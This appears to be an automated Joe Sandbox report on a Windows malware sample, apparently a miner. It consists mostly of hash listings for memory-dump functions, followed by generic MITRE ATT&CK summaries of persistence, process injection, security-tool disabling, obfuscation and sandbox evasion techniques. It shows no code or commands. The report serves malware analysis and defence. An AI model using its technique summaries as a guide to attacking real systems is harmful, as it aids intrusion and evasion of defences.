Opcode Fuzzy Hash: 0b838c5a4468eae36dce1aa79a37cf0d8edebbf1fcb4050c349d321afb3646c5
Instruction Fuzzy Hash: DC215E35B402089BDB149BB8C854BAEBBE6BBCC710F118079E505EB390DE719C048B91

Uniqueness

Uniqueness Score: -1.00%

Function 019FA5E8 Relevance: .1, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000E.00000002.550950827.00000000019FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 019FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_19fa000_services.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a14aae193918262cc53bd6d4a058d9aabc06228de8a364a6751873d5d3b6b9a2
Instruction ID: 9b198c7315592d62ed94fac7bcb369523b04a36501ed52e6bb94cb5b4d71f3f0
Opcode Fuzzy Hash: a14aae193918262cc53bd6d4a058d9aabc06228de8a364a6751873d5d3b6b9a2
Instruction Fuzzy Hash: E9212672549344BFD7118F069C05E67FFA8EB85630F08C5AFFD485B252D276A404CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 019FA51A Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.550950827.00000000019FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 019FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_19fa000_services.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc4c27e640591a2f42d92bd7a20485ed02fbf7d6d5e87ef3831ba957b70d08e1
Instruction ID: 1c62585aeec736058d464f2acbf06384c7de8c782b581b81dbeef7a79a4e5189
Opcode Fuzzy Hash: dc4c27e640591a2f42d92bd7a20485ed02fbf7d6d5e87ef3831ba957b70d08e1
Instruction Fuzzy Hash: DC212FB6644304AFD210CF0AEC41E57FBE8EB88670F14C96EFD4C97311D275A9148BA2

Uniqueness

Uniqueness Score: -1.00%

Function 019FA84A Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.550950827.00000000019FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 019FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_19fa000_services.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69b292545385e13b4002f760a7d587d3c3fcb400c10f7b6f70ccb8cd825a55e3
Instruction ID: 42929fb91aed2b00053ba58c274d378c9c1bcd33d2b0d8738d7659d3e281e534
Opcode Fuzzy Hash: 69b292545385e13b4002f760a7d587d3c3fcb400c10f7b6f70ccb8cd825a55e3
Instruction Fuzzy Hash: 90212FB6644304AFD210CF0AEC41E5BFBE8EB88671F14C96EFD4D97311D275A9148BA2

Uniqueness

Uniqueness Score: -1.00%

Function 019FA2E6 Relevance: .1, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000E.00000002.550950827.00000000019FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 019FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_19fa000_services.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a237a08815e9149877f01524f8c4be04ecf00e0e0245c92f3e5d42cf8fe2c6ab
Instruction ID: 34a8bdad6a2ac1c83fe1fccccfddfb15e2b004a2fd1789bb5a4222532e5eca2f
Opcode Fuzzy Hash: a237a08815e9149877f01524f8c4be04ecf00e0e0245c92f3e5d42cf8fe2c6ab
Instruction Fuzzy Hash: 04212FB6644304AFD210CF0AEC41E57FBE8EB88671F14C96EFD4C97311D275A9148BA2

Uniqueness

Uniqueness Score: -1.00%

Function 05DD0648 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.727249317.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5dd0000_services.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d776681a210b4c85e99b71403f781d342c08402089fca960f5c67fd617c75bc
Instruction ID: 48957663353abef8b2ac0a4be98f87ec7d6fad69682d5b555fd94339d7caf7c4
Opcode Fuzzy Hash: 3d776681a210b4c85e99b71403f781d342c08402089fca960f5c67fd617c75bc
Instruction Fuzzy Hash: 4C211931E012089BDB54DBB8E9586DDBBF6FB88214F14486AD404B7340EB369D05CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 019FA71E Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.550950827.00000000019FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 019FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_19fa000_services.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43176c9034b0aa3adaa1219656b860b25fd8b9ba719f98a79c502bf3994bf089
Instruction ID: c9df35443929eeafae62110649b62cdd90239ed1e88477231069187215f437b2
Opcode Fuzzy Hash: 43176c9034b0aa3adaa1219656b860b25fd8b9ba719f98a79c502bf3994bf089
Instruction Fuzzy Hash: A7119376644204BFD2108F06EC41D67FBE8EB84671F18C96EFD4D5B211D276B5148BA2

Uniqueness

Uniqueness Score: -1.00%

Function 019FA1BA Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.550950827.00000000019FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 019FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_19fa000_services.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffd5bad3c9832d8b1793b5197a458957adbadc76274d0f561865e3aef0954be9
Instruction ID: 07b7f6b97da76849395cfc5dc666730627943c809731ca7b33544b5b60bba1ad
Opcode Fuzzy Hash: ffd5bad3c9832d8b1793b5197a458957adbadc76274d0f561865e3aef0954be9
Instruction Fuzzy Hash: E4119376644204BFD2108F06EC41E67FBE8EB84671F18C96EFD0C5B211D276A5148BA2

Uniqueness

Uniqueness Score: -1.00%

Function 019FA3EE Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.550950827.00000000019FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 019FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_19fa000_services.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe4901d979c3bf402cd5f18d7c10e372b1e6ab7b44ccf71d0e66f02ec2c383e6
Instruction ID: 2dd6e245a7debaf99bb53ccdc20d8d8e9f6ec9d6845dbcdb7279aabddd96a721
Opcode Fuzzy Hash: fe4901d979c3bf402cd5f18d7c10e372b1e6ab7b44ccf71d0e66f02ec2c383e6
Instruction Fuzzy Hash: 05119376644304BFD2108F0AEC41D67FBE8EB84A71F18C96EFD0C5B211D276B5148BA2

Uniqueness

Uniqueness Score: -1.00%

Function 05DD0658 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.727249317.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5dd0000_services.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7861c988aca79a155f9914b6a54bf5b50c73e6eecb0031db115f2a92d499652c
Instruction ID: 1c2dbeb5926b773006b7df15a2bfa57622847e09f443c21365965bbbde9ef8db
Opcode Fuzzy Hash: 7861c988aca79a155f9914b6a54bf5b50c73e6eecb0031db115f2a92d499652c
Instruction Fuzzy Hash: CE212930E012089BDB58DBB8E9586DEBBF6FF88314F10486AD405B7340EB359D04CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 019FA774 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.550950827.00000000019FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 019FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_19fa000_services.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0360fe8355ad62877f56f40590f51bde40e3b87ca353a189c1f9ea3eb1128296
Instruction ID: 62b1cae62513929bef4fb4b222e9419f09fdfd60f1ff4d4404b5dc69fdbf490c
Opcode Fuzzy Hash: 0360fe8355ad62877f56f40590f51bde40e3b87ca353a189c1f9ea3eb1128296
Instruction Fuzzy Hash: F0214DB5509381AFD302CF159C51956BFE4EF86620F0989DAF8889B253D235A908CB62

Uniqueness

Uniqueness Score: -1.00%

Function 019FA612 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.550950827.00000000019FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 019FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_19fa000_services.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee5e0a9b439a3362ba2e545f571a830cfa4734ff9566154a21c1220e6ead3f42
Instruction ID: 21ce37457fb07eeed0ae1130ec06cfc4a044950babc9cadfea7fcc92f6f12fa7
Opcode Fuzzy Hash: ee5e0a9b439a3362ba2e545f571a830cfa4734ff9566154a21c1220e6ead3f42
Instruction Fuzzy Hash: 1111C676640204BFD6108F0AEC41E66FB9CEB84A71F18C56EFE0C5B201D276B5148BF5

Uniqueness

Uniqueness Score: -1.00%

Function 019FA570 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.550950827.00000000019FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 019FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_19fa000_services.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 076966c61215c1fe4c982be0a988c0b7fbd4f08c498d867bd792e1d2f86d9ece
Instruction ID: a415bf3f65ece061bb8a61aef040b37b11f7905041dcd9a1454bff8822ba3d69
Opcode Fuzzy Hash: 076966c61215c1fe4c982be0a988c0b7fbd4f08c498d867bd792e1d2f86d9ece
Instruction Fuzzy Hash: AD01247110E3C06FD3024B269C55A92BFB8EF43620F0C84CBED888F153D2166909C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 03401047 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.551315484.0000000003401000.00000040.00000800.00020000.00000000.sdmp, Offset: 03401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3401000_services.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f46ea80b8cf97dd13833e90d79683884821bcd514194a1e7f8972b5f240373e
Instruction ID: a1bcb835c8664b2ed8cbb372d586d21976f1a27899312a48c2923ca710c22ac1
Opcode Fuzzy Hash: 1f46ea80b8cf97dd13833e90d79683884821bcd514194a1e7f8972b5f240373e
Instruction Fuzzy Hash: 2801A7765497806FC7118B16DC40852BFE8DF8623070985ABEC888B252D2256909CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05DD05C8 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.727249317.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5dd0000_services.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea0bf60a82e05f94e960b48ffa62feb45ed8b8eb91193ed7e2a6f888aa0bd458
Instruction ID: 4aa554a3160026e9622e0636869eeb2392481b17f7fe52a2ba7979afb2f7f112
Opcode Fuzzy Hash: ea0bf60a82e05f94e960b48ffa62feb45ed8b8eb91193ed7e2a6f888aa0bd458
Instruction Fuzzy Hash: 1E01A232E001199BCB04DB58D804AFEBBB2EFC4320F10813AC91997394EB309945C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 05DD05D8 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.727249317.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5dd0000_services.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ceadbd7ea8b021b9b95f7e09162a24034774ee04b4ddc31f3a76173a53cb7230
Instruction ID: 5fbe2658638a14d64ced0505e715e28d2dc49b38e7ec59ca8bb8d9e9d97db4da
Opcode Fuzzy Hash: ceadbd7ea8b021b9b95f7e09162a24034774ee04b4ddc31f3a76173a53cb7230
Instruction Fuzzy Hash: 67F08132E0411ADBCB04EB58C504ABEF7B2EFC8320F10813AC8196B344EB75AD458BE1

Uniqueness

Uniqueness Score: -1.00%

Function 0340106E Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.551315484.0000000003401000.00000040.00000800.00020000.00000000.sdmp, Offset: 03401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3401000_services.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bb2d51746350d9bb7035172bc411213c1d23bcd1111254f5b765e8876777b33
Instruction ID: 38bd0ef1f03ca427079a34dd31f7f313046be6b1ec6a5bf14a71cb115b79df05
Opcode Fuzzy Hash: 0bb2d51746350d9bb7035172bc411213c1d23bcd1111254f5b765e8876777b33
Instruction Fuzzy Hash: FAE092766406009BD650DF0AEC41452F7D8EB84631718C47FEC0D8B711D635B504CEA5

Uniqueness

Uniqueness Score: -1.00%

Function 019FA7D7 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.550950827.00000000019FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 019FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_19fa000_services.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f45a10e39c12e75d1badd7de7548e8d70ea3d95e5df531f338e123e1324fa2e6
Instruction ID: b8c73b3b79577e80bd039c3f74594c5cddabf5db26b276603485664636e0fb90
Opcode Fuzzy Hash: f45a10e39c12e75d1badd7de7548e8d70ea3d95e5df531f338e123e1324fa2e6
Instruction Fuzzy Hash: 22E0D872641300A7D2109F069C46F16FB9CEB44A31F08C55BFD081B302E171B5048AE5

Uniqueness

Uniqueness Score: -1.00%

Function 019FA14B Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.550950827.00000000019FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 019FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_19fa000_services.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b0da41d893ed11f33ea3aa8558249ffce2788ed23d86f3ad118869e5790be24
Instruction ID: 170d2936e4216c0b1c5665ce4c975bd9f6ce79d3ef04b82d6effda66dfc7a7b6
Opcode Fuzzy Hash: 8b0da41d893ed11f33ea3aa8558249ffce2788ed23d86f3ad118869e5790be24
Instruction Fuzzy Hash: ADE0D871A41300A7D2109F079C42B12FB9CEB84931F08C56BFD0C1B301D175B5048AE5

Uniqueness

Uniqueness Score: -1.00%

Function 019FA37F Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.550950827.00000000019FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 019FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_19fa000_services.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ac1d4e0ee3d1ccc750c9ef1d3d00e509ed833a3294d3ca4d3de829c33b79a2a
Instruction ID: 0f1102b81d442f0cd31176b935e966eb978bb64df30b8fa729c12717e050d1b1
Opcode Fuzzy Hash: 4ac1d4e0ee3d1ccc750c9ef1d3d00e509ed833a3294d3ca4d3de829c33b79a2a
Instruction Fuzzy Hash: FBE0D871641304A7D2109F079C42B22FB9CEB80931F48C56BFD0C1B301D175B5048AE5

Uniqueness

Uniqueness Score: -1.00%

Function 019FA273 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.550950827.00000000019FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 019FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_19fa000_services.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76b9c3d69c59e8b43241ced4603a3e00d45a5e067d7efcefe550c1c3adb83c7d
Instruction ID: bff2165ca4f62571a5f02e7c4956ef4ae6a293764742b729ee428ec4a8b14d0c
Opcode Fuzzy Hash: 76b9c3d69c59e8b43241ced4603a3e00d45a5e067d7efcefe550c1c3adb83c7d
Instruction Fuzzy Hash: 68E0D876A41300A7D2109F06AC42F13FB9CEB80A30F08C56BFE0C1B302D171B5048AF5

Uniqueness

Uniqueness Score: -1.00%

Function 019FA6AF Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.550950827.00000000019FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 019FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_19fa000_services.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 711ae3e2cf69f43659f758a33c1c44b72b10904468099275309c20d0e76f559b
Instruction ID: a724b64aa2d5d40986cdbca7819604c70ae5f58afde1c72dad69ecd5e1f9eadd
Opcode Fuzzy Hash: 711ae3e2cf69f43659f758a33c1c44b72b10904468099275309c20d0e76f559b
Instruction Fuzzy Hash: 7AE0D875641300A7D2109F069C42B12FB9CEB80930F08C56BFD0C1B302D175B5048AE5

Uniqueness

Uniqueness Score: -1.00%

Function 019FA4A7 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.550950827.00000000019FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 019FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_19fa000_services.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8024f2bf0a289d6b120bd0a9eae24e7a45c143ffb7079c96518cd60ecccbcc83
Instruction ID: 1838057f7cdd6bdd126f476c685db0f44a3970c2dc2fd579bfc7cc517f467715
Opcode Fuzzy Hash: 8024f2bf0a289d6b120bd0a9eae24e7a45c143ffb7079c96518cd60ecccbcc83
Instruction Fuzzy Hash: BEE0D872641300A7D2109F069C42F53FB9CEB90A30F08C56BFD0C5B301D171B5048AE5

Uniqueness

Uniqueness Score: -1.00%

Function 019FA5A4 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.550950827.00000000019FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 019FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_19fa000_services.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e8f28cfc754d6e33bd79f1631487f89f1c05235870d0a733e7901ced0071d5a
Instruction ID: 6b23330c26db901b86822a890f49981f4c0d09384d311bf780f89e585b4326b4
Opcode Fuzzy Hash: 4e8f28cfc754d6e33bd79f1631487f89f1c05235870d0a733e7901ced0071d5a
Instruction Fuzzy Hash: 19E0D871641304A7D2109F079C42B12FB9CEB80970F08C56BFD0C1B701D176B5048AE5

Uniqueness

Uniqueness Score: -1.00%

Function 019E23F4 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.550841510.00000000019E2000.00000040.00000800.00020000.00000000.sdmp, Offset: 019E2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_19e2000_services.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c82b3ff037fd04923e0921ac22c5a87d0a66ab46f9c7e054d5c064557d3c9ff8
Instruction ID: 0c26a776f1f0638a8ced7418dfe484caf91b7271a552daf744f51aa6017d8136
Opcode Fuzzy Hash: c82b3ff037fd04923e0921ac22c5a87d0a66ab46f9c7e054d5c064557d3c9ff8
Instruction Fuzzy Hash: 62D05E79249A814FE3278B1CC1A8B953FE8AB91B05F4644F9E8008B677C768E581D200

Uniqueness

Uniqueness Score: -1.00%

Function 019E23BC Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.550841510.00000000019E2000.00000040.00000800.00020000.00000000.sdmp, Offset: 019E2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_19e2000_services.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc7591125d98672ac25117bc3cd1c3dc0f8918a9dfa9f7a85be6e6748b823005
Instruction ID: 7341e8b777a18d913ee3f583b226e3b41e6f219faaccc94a1183b49a69af5699
Opcode Fuzzy Hash: fc7591125d98672ac25117bc3cd1c3dc0f8918a9dfa9f7a85be6e6748b823005
Instruction Fuzzy Hash: C3D05E342402814BDB16DB0CD298F593BD8AB41B01F1654E9AC00CB366C3A4D881CA00

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 2rVBokoc2C

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Data Obfuscation

Snort Signatures

Joe Sandbox Signatures

AV Detection

Bitcoin Miner

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

